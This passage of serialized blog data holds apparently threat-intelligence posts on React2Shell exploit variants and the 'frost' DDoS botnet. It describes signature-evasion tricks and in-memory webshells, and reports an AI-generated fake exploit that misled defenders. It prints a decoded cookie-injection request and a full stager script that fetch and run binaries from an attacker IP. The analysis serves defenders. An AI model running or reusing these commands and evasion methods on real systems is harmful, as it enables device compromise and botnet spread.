requests:",[22,23450,23451,23457,23476,23482,23492],{},[25,23452,23453,23456],{},[886,23454,23455],{},"$Q"," - Directly references a chunk as a map type, allowing a payload to use a chunk as a map directly without declaring a map and allowing it to be used without a runtime declaration",[25,23458,23459,23462,23463,982,23465,23467,23468,23471,23472,23475],{},[886,23460,23461],{},"$K"," - Directly references other form types as chunks, meaning that the attackers targeting Next.js have the opportunity to not just use the single multipart filenames such a ",[886,23464,445],{},[886,23466,467],{}," that are common, but can reference other forms based on their integer and reference id. For example: ",[886,23469,23470],{},"$K1_test"," will allow access to the ",[886,23473,23474],{},"1_test"," form value.",[25,23477,23478,23481],{},[886,23479,23480],{},"$D"," - Date functions direct values",[25,23483,23484,23487,23488,23491],{},[886,23485,23486],{},"$u"," - Undefined without directly using the ",[886,23489,23490],{},"undefined"," keyword",[25,23493,23494],{},"And many many more",[18,23496,23497],{},"From an attacker’s perspective, the post-exploitation story for React2Shell is nearly perfect: a single request that is difficult to detect that results in direct manipulation of the active in-memory runtime that can allow complex manipulation of the back-end server state and access to arbitrary JavaScript runtime actions.",[18,23499,23500],{},"This has led to some interesting observations and variants seen in the wild.",[61,23502,23504],{"id":23503},"known-exploits-current-state","Known Exploits: Current State",[18,23506,23507],{},"The following roughly models the state of PoCs and exploits VulnCheck’s research team has analyzed based on our data corpus: Initial execution-based, in-memory, Unicode escaping in JSON, in-memory webshells, and classic droppers. It’s also likely that we haven’t yet seen the full range of exploit variants and pathways, and may not for some time.",[18,23509,23510,23511,23515,23516,982,23518,23520,23521,23523],{},"Initial execution-based exploits are the simplest and were the most common immediately following the publication of the first valid PoCs. These often had a similar structure to the ",[47,23512,23514],{"href":22088,"rel":23513},[51],"maple3142 PoC"," in that they simply call the NodeJS ",[886,23517,18710],{},[886,23519,1622],{}," modules to directly access ",[886,23522,21540],{}," or similar OS command execution payloads. These can be used to call reverse shells or reach simple OS command sinks that are extremely common in logic exploitation bugs.",[18,23525,23526],{},"This led to the next “staged” style payloads that are very common in simple PoCs and exploitation: droppers. Simply put, these variants just write the second-stage payload to disk and either execute it or drop a backdoor set of files to establish permanent access.",[18,23528,23529,23530,1554,23532,23534],{},"The next logical step is that instead of directly calling system commands, we instead observed payloads starting to use the chunk that evaluates the JavaScript runtime to reside in memory, thus allowing adversaries to conduct activities entirely from the injected-into runtime. This is excellent for attackers because it means they can work without touching disk; it also allows for staging of next-step payloads even in environments without writable disks, which greatly decreases likelihood of leaving artifacts behind. These types of payloads started to appear nearly immediately after the first real PoCs were published and . This attack variant was one of the first variants our team created to bypass rules looking for simple ",[886,23531,1622],{},[886,23533,21540],{}," calls, immediately breaking a large subset of early emerging threat rules.",[18,23536,23537,23538,23543,23544,23547,23548,23551,23552,23555],{},"One of the next variants that we saw took advantage of the fact that the RFP chunks were almost uniformly distributed via ",[47,23539,23542],{"href":23540,"rel":23541},"https:\u002F\u002Fx.com\u002Fpyn3rd\u002Fstatus\u002F1996788502386909539",[51],"JSON objects inside of HTTP forms",". Since these are just JSON strings, as exploit developers we immediately recognized the value of being able to combine the chunk logic and JSON string handling that occurs prior to the parsing of the RFP logic, allowing pretty much any part of the RFP request to be escaped with Unicode ",[886,23545,23546],{},"\\uXXXX"," strings to opportunistically mask the specific fingerprints that had already become common. Suddenly, more detection rules and signatures could be bypassed by simply turning ",[886,23549,23550],{},"resolved_model"," into ",[886,23553,23554],{},"\\u0072\\u0065\\u0073\\u006f\\u006c\\u0076\\u0065\\u0064\\u005f\\u006d\\u006f\\u0064\\u0065\\u006c"," (and better yet, mixing and matching the Unicode escaping). This also forces network signatures to rely on pattern matching, which is more expensive and also generally a pain.",[18,23557,23558,23559,23564,23565,23569],{},"Attackers love a ",[47,23560,23563],{"href":23561,"rel":23562},"https:\u002F\u002Flangsec.org\u002Fpapers\u002FBratus.pdf",[51],"Weird Machine",", and being able to directly modify the running server state allowed for some interesting interactions. The most notable one that we identified was a variant that would ",[47,23566,23568],{"href":22224,"rel":23567},[51],"modify the NodeJS HTTP server prototype"," to allow an entirely in-memory webshell. Yes, you read that correctly. By modifying the prototype carefully, the currently running web server would expose an attacker-controlled path that could provide access to code execution on HTTP paths that were not exposed by the application, were not RFP requests, and would persist until the server is restarted and the Node HTTP prototype is reloaded. This is a nightmare for detection capabilities. Suddenly it was possible to send a single request that, if not caught by detections from the initial request, provided access to code execution on arbitrary attacker-controlled paths with low likelihood of detection.",[18,23571,23572,23573,23576],{},"For a creative attacker, the opportunities suddenly become limitless. We did some whiteboarding and came up with some a few ideas for potential payloads: hooks directly in the TCP handling for Node, entirely in-memory bi-directional encrypted shells, self-modifying the running server to backdoor the server runtime, hiding an in-memory webshell that simulates attacking non-JavaScript behavior by making it look like common drive-by webshells (that will subtly respond to an attacker), injection into Git hooks, and the list goes on. For defenders, this means that “look for RFP requests” may no longer be an effective strategy, and instead will have to shift to “has anyone ",[1131,23574,23575],{},"ever"," sent an RFP request?”",[61,23578,23580],{"id":23579},"the-before-times-prior-to-real-pocs","The Before Times: Prior to Real PoCs",[18,23582,23583],{},"In the initial hours after CVE-2025-55182 was disclosed, there was a flood of wrong PoCs and repositories based on automated analysis or LLM-generated code. This serves as an interesting case study in how usage of these tools can lead to inaccurate information and a breakdown in detection quality that makes organizations less secure than they would be if they did not have false information.",[18,23585,23586,23587,23592,23593,23595,23596,23601,23602,23605],{},"The widely circulated ",[47,23588,23591],{"href":23589,"rel":23590},"https:\u002F\u002Fgithub.com\u002Fejpir\u002FCVE-2025-55182-research",[51],"ejpir\u002FCVE-2025-55182-research"," repository now states that it is a research project driven by Claude. Unfortunately, during the initial hours of the incident, this was one of the first public repositories to surface; at the time, not only did it ",[1131,23594,6881],{}," contain a warning about AI-generated code, it actually specified that “",[47,23597,23600],{"href":23598,"rel":23599},"https:\u002F\u002Fgithub.com\u002Fejpir\u002FCVE-2025-55182-research\u002Fcommit\u002Fe6f3f7f275a20c0ebc282b5cef37b833b458a16e#diff-b335630551682c19a781afebcf4d07bf978fb1f8ac04c6bf87428ed5106870f5",[51],"This is the **real working POC** using actual `react-server-dom-webpack@19.0.0` vulnerable code.","” In hindsight, the PoC and code are obviously wrong, but at the time, that repo was one of the only publicly available PoCs that looked like it ",[1131,23603,23604],{},"could"," be legitimate — and it quickly became clear that people believed it was valid without any evidence that the code path reached the vulnerable components.",[18,23607,23608,23609,23612],{},"Many reputable organizations and security providers quickly jumped at the first available piece of information that looked like it could potentially be legit; security firms used it as a basis for signatures and fingerprints, researchers used it for copycat PoCs, and bad information was spread far and wide as many began (incorrectly) looking for ",[886,23610,23611],{},"vm#runInThisContext"," rather than looking for the RFP data chunks. VulnCheck researchers were actively working on this vulnerability at the time and quickly determined that the exploit and application was contrived to the point of not being real. It also did not match any of the patterns that were available in the fix.",[18,23614,23615,23616,23620],{},"Lachlan Davidson, the original vulnerability discoverer, eventually posted a warning on the ",[47,23617,22739],{"href":23618,"rel":23619},"https:\u002F\u002Freact2shell.com\u002F",[51]," website about invalid PoCs, particularly “anything that requires the developer to have explicitly exposed dangerous functionality to the client,” including PoCs using vm#runInThisContext, child_process#exec, and fs#writeFile. Unfortunately, it’s hard to put the genie back in the bottle in today’s vulnerability data ecosystem, and as a result organizations may have thought they were protected based on AI-generated code that got picked up as true without any real vetting or validation.",[61,23622,1903],{"id":1902},[18,23624,23625,23626,23629],{},"React2Shell exploitation is ongoing and is likely to have a long tail. The VulnCheck team has noted several exploit variants already, and we anticipate that others will be released as researchers and adversaries explore pathways for RCE. Public PoCs are widely available but are so far largely targeting ",[47,23627,21191],{"href":21189,"rel":23628},[51]," applications, which are an important attack vector but shouldn’t be considered the only options. Organizations should consider variants and possible payload modifications when building their detection strategies, especially since the nature of the vulnerability gives adversaries access to a wide range of hard-to-detect post-exploitation options.",[61,23631,202],{"id":201},[18,23633,10768,23634,1246,23637,10775,23640,23643,23644,1246,23647,1255,23650,59],{},[47,23635,283],{"href":281,"rel":23636},[51],[47,23638,216],{"href":1258,"rel":23639},[51],[47,23641,1251],{"href":1249,"rel":23642},[51]," datasets. Additional insight into React2Shell exploitation, PoCs, and payloads can be found in the following blogs: ",[47,23645,21687],{"href":20134,"rel":23646},[51],[47,23648,21694],{"href":21690,"rel":23649},[51],[47,23651,21701],{"href":21697,"rel":23652},[51],[18,23654,1228,23655,1234,23658,1240,23661,1246,23664,1246,23667,1255,23670,1260],{},[47,23656,1233],{"href":10806,"rel":23657},[51],[47,23659,1239],{"href":1237,"rel":23660},[51],[47,23662,1245],{"href":1243,"rel":23663},[51],[47,23665,1251],{"href":1249,"rel":23666},[51],[47,23668,283],{"href":281,"rel":23669},[51],[47,23671,216],{"href":1258,"rel":23672},[51],{"title":219,"searchDepth":220,"depth":220,"links":23674},[23675,23676,23677,23678,23679,23680],{"id":23339,"depth":220,"text":23340},{"id":23414,"depth":220,"text":23415},{"id":23503,"depth":220,"text":23504},{"id":23579,"depth":220,"text":23580},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2025-12-08","An analysis of React2Shell variants, public exploits, paths to RCE, and implications for detection and response",{"slug":23684},"reacting-to-shells-react2shell-variants-ecosystem","\u002Fblog\u002Freacting-to-shells-react2shell-variants-ecosystem",{"title":21687,"description":23682},"blog\u002Freacting-to-shells-react2shell-variants-ecosystem",[242,1280,1279],"-7tp04YdcrRlLRMTEPkIgujcHBb1M_qDp0nm-yocxjQ",{"id":23691,"title":20129,"articles":23692,"authors":23699,"body":23701,"date":25029,"description":25030,"extension":234,"image":7,"link":7,"meta":25031,"navigation":237,"path":25033,"seo":25034,"series":7,"stem":25035,"subtype":7,"tags":25036,"__hash__":25037},"blog\u002Fblog\u002Ffrost-checks-first.md",[23693,23696],{"title":23694,"source":14382,"link":23695,"date":23681},"Sneeit WordPress RCE Exploited in the Wild While ICTBroadcast Bug Fuels Frost Botnet Attacks","https:\u002F\u002Fthehackernews.com\u002F2025\u002F12\u002Fsneeit-wordpress-rce-exploited-in-wild.html",{"title":23697,"source":11228,"link":23698,"date":22718},"Exploitation of Sneeit WordPress RCE, ICTBroadcast flaw ongoing","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fexploitation-of-sneeit-wordpress-rce-ictbroadcast-flaw-ongoing",[23700],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":23702,"toc":25024},[23703,23706,23710,23719,24008,24011,24017,24032,24038,24045,24050,24073,24079,24305,24308,24328,24334,24337,24500,24515,24551,24557,24563,24662,24671,24787,24790,24812,24818,24834,24840,24855,24857,24869,24887,24907,24911,24914,24926,24929,24943,24947,25021],[263,23704],{":list":23705,"ico":266,"title":20},"[\"`frost`, a DDoS and spreader tool, uses strict match conditions and only attempts exploitation when a target's responses match expected output, which is why our Canary Intelligence was able to surface this activity.\",\"VulnCheck links most of the CVEs used by `frost` to long-running botnets. Nearly all appear in the VulnCheck KEV but only four appear in the CISA KEV. CVE-2025-1610 is the only new one that appears in neither list.\",\"Our IP Intelligence shows the exposed target population for these vulnerabilities is small, which limits the impact of this campaign. However, `frost` does not include the originally observed ICTBroadcast exploit (CVE-2025-2611), implying the operator has additional exploits beyond what appears in the binary.\"]",[1920,23707,23709],{"id":23708},"about-frost","About Frost",[18,23711,23712,23713,23718],{},"Starting on November 28, 2025 we began seeing new attacks on our ICTBroadcast ",[47,23714,23717],{"href":23715,"rel":23716},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-2611",[51],"CVE-2025-2611"," canaries. The raw canary data looks like:",[1354,23720,23722],{"className":22307,"code":23721,"language":22309,"meta":219,"style":219},"{\n \"src_ip\": \"87.121.84.52\",\n \"src_port\": 55590,\n \"src_country\": \"NL\",\n \"dst_country\": \"US\",\n \"cve\": \"CVE-2025-2611\",\n \"signature_id\": 12700629,\n \"signature\": \"VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt\",\n \"category\": \"Web Application Attack\",\n \"severity\": 1,\n \"payload\": \"R0VUIC9sb2dpbi5waHAgSFRUUC8xLjANCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQ7IHJ2OjE0MC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzE0MC4wDQpDb29raWU6IEJST0FEQ0FTVD1gd2dldCR7SUZTfWh0dHA6Ly84Ny4xMjEuODQuNTIvbWlzYy5pY3Ricm9hZGNhc3Quc2gke0lGU30tTy18c2hgOyBpY3Ricm9hZGNhc3Q9YHdnZXQke0lGU31odHRwOi8vODcuMTIxLjg0LjUyL21pc2MuaWN0YnJvYWRjYXN0LnNoJHtJRlN9LU8tfHNoYA0KDQo=\",\n \"http\": {\n \"url\": \"\u002Flogin.php\",\n \"http_user_agent\": \"Mozilla\u002F5.0 (X11; Linux x86_64; rv:140.0) Gecko\u002F20100101 Firefox\u002F140.0\",\n \"protocol\": \"HTTP\u002F1.0\"\n },\n \"timestamp\": \"2025-12-01T13:14:41.919Z\"\n}\n",[886,23723,23724,23728,23748,23764,23784,23804,23822,23838,23858,23878,23893,23912,23924,23943,23963,23981,23986,24004],{"__ignoreMap":219},[1373,23725,23726],{"class":1375,"line":1376},[1373,23727,8904],{"class":1383},[1373,23729,23730,23733,23736,23738,23740,23742,23744,23746],{"class":1375,"line":220},[1373,23731,23732],{"class":9152}," \"",[1373,23734,23735],{"class":9155},"src_ip",[1373,23737,183],{"class":9152},[1373,23739,4606],{"class":1383},[1373,23741,4883],{"class":9173},[1373,23743,23135],{"class":9176},[1373,23745,183],{"class":9173},[1373,23747,9062],{"class":1383},[1373,23749,23750,23752,23755,23757,23759,23762],{"class":1375,"line":1266},[1373,23751,23732],{"class":9152},[1373,23753,23754],{"class":9155},"src_port",[1373,23756,183],{"class":9152},[1373,23758,4606],{"class":1383},[1373,23760,23761],{"class":5467}," 55590",[1373,23763,9062],{"class":1383},[1373,23765,23766,23768,23771,23773,23775,23777,23780,23782],{"class":1375,"line":1852},[1373,23767,23732],{"class":9152},[1373,23769,23770],{"class":9155},"src_country",[1373,23772,183],{"class":9152},[1373,23774,4606],{"class":1383},[1373,23776,4883],{"class":9173},[1373,23778,23779],{"class":9176},"NL",[1373,23781,183],{"class":9173},[1373,23783,9062],{"class":1383},[1373,23785,23786,23788,23791,23793,23795,23797,23800,23802],{"class":1375,"line":4692},[1373,23787,23732],{"class":9152},[1373,23789,23790],{"class":9155},"dst_country",[1373,23792,183],{"class":9152},[1373,23794,4606],{"class":1383},[1373,23796,4883],{"class":9173},[1373,23798,23799],{"class":9176},"US",[1373,23801,183],{"class":9173},[1373,23803,9062],{"class":1383},[1373,23805,23806,23808,23810,23812,23814,23816,23818,23820],{"class":1375,"line":4724},[1373,23807,23732],{"class":9152},[1373,23809,242],{"class":9155},[1373,23811,183],{"class":9152},[1373,23813,4606],{"class":1383},[1373,23815,4883],{"class":9173},[1373,23817,23717],{"class":9176},[1373,23819,183],{"class":9173},[1373,23821,9062],{"class":1383},[1373,23823,23824,23826,23829,23831,23833,23836],{"class":1375,"line":4756},[1373,23825,23732],{"class":9152},[1373,23827,23828],{"class":9155},"signature_id",[1373,23830,183],{"class":9152},[1373,23832,4606],{"class":1383},[1373,23834,23835],{"class":5467}," 12700629",[1373,23837,9062],{"class":1383},[1373,23839,23840,23842,23845,23847,23849,23851,23854,23856],{"class":1375,"line":4768},[1373,23841,23732],{"class":9152},[1373,23843,23844],{"class":9155},"signature",[1373,23846,183],{"class":9152},[1373,23848,4606],{"class":1383},[1373,23850,4883],{"class":9173},[1373,23852,23853],{"class":9176},"VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt",[1373,23855,183],{"class":9173},[1373,23857,9062],{"class":1383},[1373,23859,23860,23862,23865,23867,23869,23871,23874,23876],{"class":1375,"line":4792},[1373,23861,23732],{"class":9152},[1373,23863,23864],{"class":9155},"category",[1373,23866,183],{"class":9152},[1373,23868,4606],{"class":1383},[1373,23870,4883],{"class":9173},[1373,23872,23873],{"class":9176},"Web Application Attack",[1373,23875,183],{"class":9173},[1373,23877,9062],{"class":1383},[1373,23879,23880,23882,23885,23887,23889,23891],{"class":1375,"line":4798},[1373,23881,23732],{"class":9152},[1373,23883,23884],{"class":9155},"severity",[1373,23886,183],{"class":9152},[1373,23888,4606],{"class":1383},[1373,23890,5468],{"class":5467},[1373,23892,9062],{"class":1383},[1373,23894,23895,23897,23899,23901,23903,23905,23908,23910],{"class":1375,"line":4806},[1373,23896,23732],{"class":9152},[1373,23898,11736],{"class":9155},[1373,23900,183],{"class":9152},[1373,23902,4606],{"class":1383},[1373,23904,4883],{"class":9173},[1373,23906,23907],{"class":9176},"R0VUIC9sb2dpbi5waHAgSFRUUC8xLjANCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQ7IHJ2OjE0MC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzE0MC4wDQpDb29raWU6IEJST0FEQ0FTVD1gd2dldCR7SUZTfWh0dHA6Ly84Ny4xMjEuODQuNTIvbWlzYy5pY3Ricm9hZGNhc3Quc2gke0lGU30tTy18c2hgOyBpY3Ricm9hZGNhc3Q9YHdnZXQke0lGU31odHRwOi8vODcuMTIxLjg0LjUyL21pc2MuaWN0YnJvYWRjYXN0LnNoJHtJRlN9LU8tfHNoYA0KDQo=",[1373,23909,183],{"class":9173},[1373,23911,9062],{"class":1383},[1373,23913,23914,23916,23918,23920,23922],{"class":1375,"line":4817},[1373,23915,23732],{"class":9152},[1373,23917,6277],{"class":9155},[1373,23919,183],{"class":9152},[1373,23921,4606],{"class":1383},[1373,23923,4765],{"class":1383},[1373,23925,23926,23928,23930,23932,23934,23936,23939,23941],{"class":1375,"line":4825},[1373,23927,19050],{"class":9152},[1373,23929,7585],{"class":9165},[1373,23931,183],{"class":9152},[1373,23933,4606],{"class":1383},[1373,23935,4883],{"class":9173},[1373,23937,23938],{"class":9176},"\u002Flogin.php",[1373,23940,183],{"class":9173},[1373,23942,9062],{"class":1383},[1373,23944,23945,23947,23950,23952,23954,23956,23959,23961],{"class":1375,"line":4835},[1373,23946,19050],{"class":9152},[1373,23948,23949],{"class":9165},"http_user_agent",[1373,23951,183],{"class":9152},[1373,23953,4606],{"class":1383},[1373,23955,4883],{"class":9173},[1373,23957,23958],{"class":9176},"Mozilla\u002F5.0 (X11; Linux x86_64; rv:140.0) Gecko\u002F20100101 Firefox\u002F140.0",[1373,23960,183],{"class":9173},[1373,23962,9062],{"class":1383},[1373,23964,23965,23967,23970,23972,23974,23976,23979],{"class":1375,"line":4843},[1373,23966,19050],{"class":9152},[1373,23968,23969],{"class":9165},"protocol",[1373,23971,183],{"class":9152},[1373,23973,4606],{"class":1383},[1373,23975,4883],{"class":9173},[1373,23977,23978],{"class":9176},"HTTP\u002F1.0",[1373,23980,19057],{"class":9173},[1373,23982,23983],{"class":1375,"line":4849},[1373,23984,23985],{"class":1383}," },\n",[1373,23987,23988,23990,23993,23995,23997,23999,24002],{"class":1375,"line":4877},[1373,23989,23732],{"class":9152},[1373,23991,23992],{"class":9155},"timestamp",[1373,23994,183],{"class":9152},[1373,23996,4606],{"class":1383},[1373,23998,4883],{"class":9173},[1373,24000,24001],{"class":9176},"2025-12-01T13:14:41.919Z",[1373,24003,19057],{"class":9173},[1373,24005,24006],{"class":1375,"line":4915},[1373,24007,1855],{"class":1383},[18,24009,24010],{},"Decoding the payload field reveals the attacker's exploit:",[1354,24012,24015],{"className":24013,"code":24014,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.0\nHost: VC_REDACTED\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64; rv:140.0) Gecko\u002F20100101 Firefox\u002F140.0\nCookie: BROADCAST=`wget${IFS}http:\u002F\u002F87.121.84.52\u002Fmisc.ictbroadcast.sh${IFS}-O-|sh`; ictbroadcast=`wget${IFS}http:\u002F\u002F87.121.84.52\u002Fmisc.ictbroadcast.sh${IFS}-O-|sh`\n",[886,24016,24014],{"__ignoreMap":219},[18,24018,24019,24020,24027,24028,24031],{},"As we covered in our earlier write up, ",[1131,24021,24022],{},[47,24023,24026],{"href":24024,"rel":24025},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fictbroadcast-kev",[51],"ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611)",", exploitation runs through the Cookie field. Here the attacker pulls down a ",[886,24029,24030],{},"misc.ictbroadcast.sh"," script from the same host and executes it with sh. The script is the usual multi-architecture stager. The full script is shown below:",[1354,24033,24036],{"className":24034,"code":24035,"language":1359,"meta":219},[1357],"cd \u002Ftmp || cd \u002Fvar\u002Ftmp || cd \u002Fvar || cd \u002Fmnt || cd \u002Fdev || cd \u002F\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.armv7 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.armv6 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.armv5 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.mips -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.mipsel -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.aarch64 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.armv7b -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.x86 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nwget http:\u002F\u002F87.121.84.52\u002Ffrost.x86_64 -O- > wung; chmod 777 wung; .\u002Fwung misc.ictbroadcast; rm wung\nrm misc.ictbroadcast.sh\n",[886,24037,24035],{"__ignoreMap":219},[18,24039,24040,24041,24044],{},"The attacker downloads several architecture-specific versions of a binary they name ",[886,24042,24043],{},"frost",", runs each one in turn, deletes them, and then deletes the stager.",[18,24046,2245,24047,24049],{},[886,24048,24043],{}," binary combines DDoS tooling with spreader logic that includes fourteen exploits for fifteen CVEs. The important part is how it spreads. The operator is not carpet bombing the internet with exploits. `frost` checks the target first and only proceeds with exploitation when it sees the specific indicators it expects.",[18,24051,24052,24053,24055,24056,24061,24062,24064,24065,24068,24069,24072],{},"For example, ",[886,24054,24043],{}," will only exploit ",[47,24057,24060],{"href":24058,"rel":24059},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-1610",[51],"CVE-2025-1610"," after first receiving an HTTP response to ",[886,24063,12012],{}," that contains ",[886,24066,24067],{},"Set-Cookie: user=(null)"," and then a follow-on response to a second request that contains ",[886,24070,24071],{},"Set-Cookie: user=admin",". If those markers are not there, it does nothing. If they are, it commits. This is the kind of selective behavior our canaries catch.",[18,24074,24075,24076,24078],{},"The table below shows how far this selectivity goes. Each exploit path has its own fingerprint checks, and ",[886,24077,24043],{}," will only run the exploit when those conditions match.",[307,24080,24081,24093],{},[310,24082,24083],{},[313,24084,24085,24089,24091],{},[316,24086,24088],{"align":24087},"left","Match Condition",[316,24090,319],{"align":24087},[316,24092,3581],{"align":24087},[336,24094,24095,24110,24125,24138,24153,24167,24180,24195,24210,24230,24245,24260,24275,24290],{},[313,24096,24097,24100,24107],{},[341,24098,24099],{"align":24087},"Basic realm=\"DVR”",[341,24101,24102],{"align":24087},[47,24103,24106],{"href":24104,"rel":24105},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-34132",[51],"CVE-2025-34132",[341,24108,24109],{"align":24087},"Lilin",[313,24111,24112,24115,24122],{},[341,24113,24114],{"align":24087},"Server: GoAhead-Webs + JS Content",[341,24116,24117],{"align":24087},[47,24118,24121],{"href":24119,"rel":24120},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2017-18377",[51],"CVE-2017-18377",[341,24123,24124],{"align":24087},"WifiCam",[313,24126,24127,24130,24135],{},[341,24128,24129],{"align":24087},"Set-Cookie: user=(null) + Set-Cookie: user=admin",[341,24131,24132],{"align":24087},[47,24133,24060],{"href":24058,"rel":24134},[51],[341,24136,24137],{"align":24087},"LBLink",[313,24139,24140,24143,24150],{},[341,24141,24142],{"align":24087},"Server: lighttpd",[341,24144,24145],{"align":24087},[47,24146,24149],{"href":24147,"rel":24148},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-34152",[51],"CVE-2025-34152",[341,24151,24152],{"align":24087},"Shenzhen Aitemi",[313,24154,24155,24157,24164],{},[341,24156,24142],{"align":24087},[341,24158,24159],{"align":24087},[47,24160,24163],{"href":24161,"rel":24162},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-46574",[51],"CVE-2023-46574",[341,24165,24166],{"align":24087},"TOTOLINK",[313,24168,24169,24171,24178],{},[341,24170,24142],{"align":24087},[341,24172,24173],{"align":24087},[47,24174,24177],{"href":24175,"rel":24176},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2022-40475",[51],"CVE-2022-40475",[341,24179,24166],{"align":24087},[313,24181,24182,24185,24192],{},[341,24183,24184],{"align":24087},"AuthInfo:",[341,24186,24187],{"align":24087},[47,24188,24191],{"href":24189,"rel":24190},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2018-25126",[51],"CVE-2018-25126",[341,24193,24194],{"align":24087},"TVT",[313,24196,24197,24200,24207],{},[341,24198,24199],{"align":24087},"URL=\u002Fwebpages\u002Flogin.html",[341,24201,24202],{"align":24087},[47,24203,24206],{"href":24204,"rel":24205},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-1389",[51],"CVE-2023-1389",[341,24208,24209],{"align":24087},"TP-Link",[313,24211,24212,24215,24227],{},[341,24213,24214],{"align":24087},"Server: httpd_four-faith",[341,24216,24217,1246,24222],{"align":24087},[47,24218,24221],{"href":24219,"rel":24220},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-9644",[51],"CVE-2024-9644",[47,24223,24226],{"href":24224,"rel":24225},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-12856",[51],"CVE-2024-12856",[341,24228,24229],{"align":24087},"Four Faith",[313,24231,24232,24235,24242],{},[341,24233,24234],{"align":24087},"Server: Http Server",[341,24236,24237],{"align":24087},[47,24238,24241],{"href":24239,"rel":24240},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2020-10987",[51],"CVE-2020-10987",[341,24243,24244],{"align":24087},"Tenda",[313,24246,24247,24250,24257],{},[341,24248,24249],{"align":24087},"Location: \u002Flogin.rsp",[341,24251,24252],{"align":24087},[47,24253,24256],{"href":24254,"rel":24255},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-3721",[51],"CVE-2024-3721",[341,24258,24259],{"align":24087},"TBK DVR",[313,24261,24262,24265,24272],{},[341,24263,24264],{"align":24087},"Server: FSM-Webs",[341,24266,24267],{"align":24087},[47,24268,24271],{"href":24269,"rel":24270},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-7311",[51],"CVE-2023-7311",[341,24273,24274],{"align":24087},"BYTEVALUE",[313,24276,24277,24280,24287],{},[341,24278,24279],{"align":24087},"Server: DWS",[341,24281,24282],{"align":24087},[47,24283,24286],{"href":24284,"rel":24285},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-12987",[51],"CVE-2024-12987",[341,24288,24289],{"align":24087},"Draytek",[313,24291,24292,24295,24302],{},[341,24293,24294],{"align":24087},"Server: jjhttpd",[341,24296,24297],{"align":24087},[47,24298,24301],{"href":24299,"rel":24300},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2021-45382",[51],"CVE-2021-45382",[341,24303,24304],{"align":24087},"D-Link",[18,24306,24307],{},"Some match conditions are very specific, such as CVE-2025-1610 and CVE-2017-18377, which requires the GoAhead-Webs banner and specific JavaScript content. Others are much looser. CVE-2022-40475, for example, only checks for a lighttpd server banner.",[18,24309,24310,24311,24313,24314,24317,24318,24321,24322,24325,24326,59],{},"Each exploit works in a similar way. Successful exploitation downloads a stager script, and the stager retrieves the secondary binary (a DDoS and spreader tool, ",[886,24312,24043],{},"). The attacker has named each stager according to the exploited target. For example, CVE-2023-7311 uses ",[886,24315,24316],{},"router.bytevalue-rep.sh"," and CVE-2025-34132 uses ",[886,24319,24320],{},"dvr.lilin-rep.sh",". All of them follow the same ",[886,24323,24324],{},"\u003Chost-type>.\u003Cvendor>-rep.sh"," naming pattern. Even the ICTBroadcast path follows this format with ",[886,24327,24030],{},[18,24329,24330],{},[68,24331],{"alt":24332,"src":24333},"Script pattern in frost exploit","\u002Fblog\u002Ffrost-checks-first\u002Faitemi-exploit.png",[18,24335,24336],{},"The table below summarizes all fourteen stager names and their associated CVEs.",[307,24338,24339,24348],{},[310,24340,24341],{},[313,24342,24343,24345],{},[316,24344,319],{"align":24087},[316,24346,24347],{"align":24087},"Stager 